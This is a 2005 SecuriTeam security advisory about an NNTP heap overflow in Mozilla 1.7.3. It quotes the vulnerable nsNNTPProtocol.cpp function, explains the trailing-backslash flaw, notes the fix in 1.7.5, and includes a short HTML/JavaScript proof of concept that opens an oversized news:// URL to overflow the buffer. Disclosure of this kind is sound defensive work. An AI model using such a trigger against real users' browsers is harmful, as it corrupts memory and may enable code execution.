[UNIX] Mozilla Browser NNTP Heap Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 01/02/05

  • Next message: SecuriTeam: "[UNIX] vBulletin init.php SQL Injection (specialtemplates)"
    To: list@securiteam.com
    Date: 2 Jan 2005 17:06:08 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Mozilla Browser NNTP Heap Overflow
    ------------------------------------------------------------------------

    SUMMARY

    A critical security vulnerability has been found in Mozilla Project code
    handling NNTP protocol.

    DETAILS

    Vulnerable Systems:
     * Mozilla Browser version 1.7.3 and prior with mozilla-mail

    Immune Systems:
     * Mozilla Browser version 1.7.5 or newer

    Mozilla browser supports NNTP URLs. Remote side is able to trigger
    news:// connection to any server. Maurycy found a flaw in NNTP handling
    code which may cause heap overflow and allow remote attacker to execute
    arbitrary code on client machine.

    Bugus function from nsNNTPProtocol.cpp:
    char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
    329 {
    330 char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) +
    1);
    331 if (result)
    332 {
    333 char *resultPtr = result;
    334 while (1)
    335 {
    336 char ch = *commandSpecificData++;
    337 if (!ch)
    338 break;
    339 if (ch == '\\')
    340 {
    341 char scratchBuf[3];
    342 scratchBuf[0] = (char) *commandSpecificData++;
    343 scratchBuf[1] = (char) *commandSpecificData++;
    344 scratchBuf[2] = '\0';
    345 int accum = 0;
    346 PR_sscanf(scratchBuf, "%X", &accum);
    347 *resultPtr++ = (char) accum;
    348 }
    349 else
    350 *resultPtr++ = ch;
    351 }
    352 *resultPtr = '\0';
    353 }
    354 return result;
    355 }

    When commandSpecificData points to last (next is NULL) character which is
    '\\' copying loop may omit termination of source char array and overflow
    result buffer.

    Solution:
    This bug is fixed in Mozilla 1.7.5. (Bug 264388) Mozilla developer Dan
    Veditz claims that it cannot be exploitable: "A '\' on the end will
    certainly trash memory, but at that point you're no longer reading
    attacker-supplied data;".

    On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code
    overflows the buffer using attacker-supplied data. I decided to make this
    bug public because Mozilla Team hasn't warned users.

    Proof of concept:
    < html>
    < script>
    i = "news://news.individual.net/AAAAAAAAAAAAAA?";
    for(l = 0; l < 16376; l++)
      i=i+"A";
    i=i+"/?profile/";
    for(l = 0; l < 16384; l++)
      i=i+"A";
    i=i+"\\";
    window.open(i);
    </script>
    </html>

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:z33d@isec.pl> Maurycy
    Prodeus.
    The original article can be found at:
    <http://isec.pl/vulnerabilities/isec-0020-mozilla.txt>
    http://isec.pl/vulnerabilities/isec-0020-mozilla.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] vBulletin init.php SQL Injection (specialtemplates)"

    Relevant Pages

    • [NEWS] Gecko Based Browser IDN Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Meaning, Firefox appends 0 to ... Mozilla foundeation has released a patch for Firefox: ...
      (Securiteam)
    • [EXPL] Mozilla Firefox Arbitrary Code Execution (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Mozilla Firefox (originally known as Phoenix and briefly as Mozilla ... Software installation trigger not sufficiently checking image URLs ...
      (Securiteam)
    • [NEWS] XBL Implementation Allows Script Execution (Gecko)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Bindings can be attached to elements using either cascading ... * Mozilla Suite and Email client version 1.7.8 and prior ...
      (Securiteam)
    • [NEWS] Mozilla Platforms Code Execution Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... "The mission of the <www.mozilla.org> Mozilla project is to preserve ... Vulnerable Systems: ... * Mozilla Firefox version 1.0.1 and prior ...
      (Securiteam)
    • [NEWS] Ventrilo Denial of Service
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char *data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ...
      (Securiteam)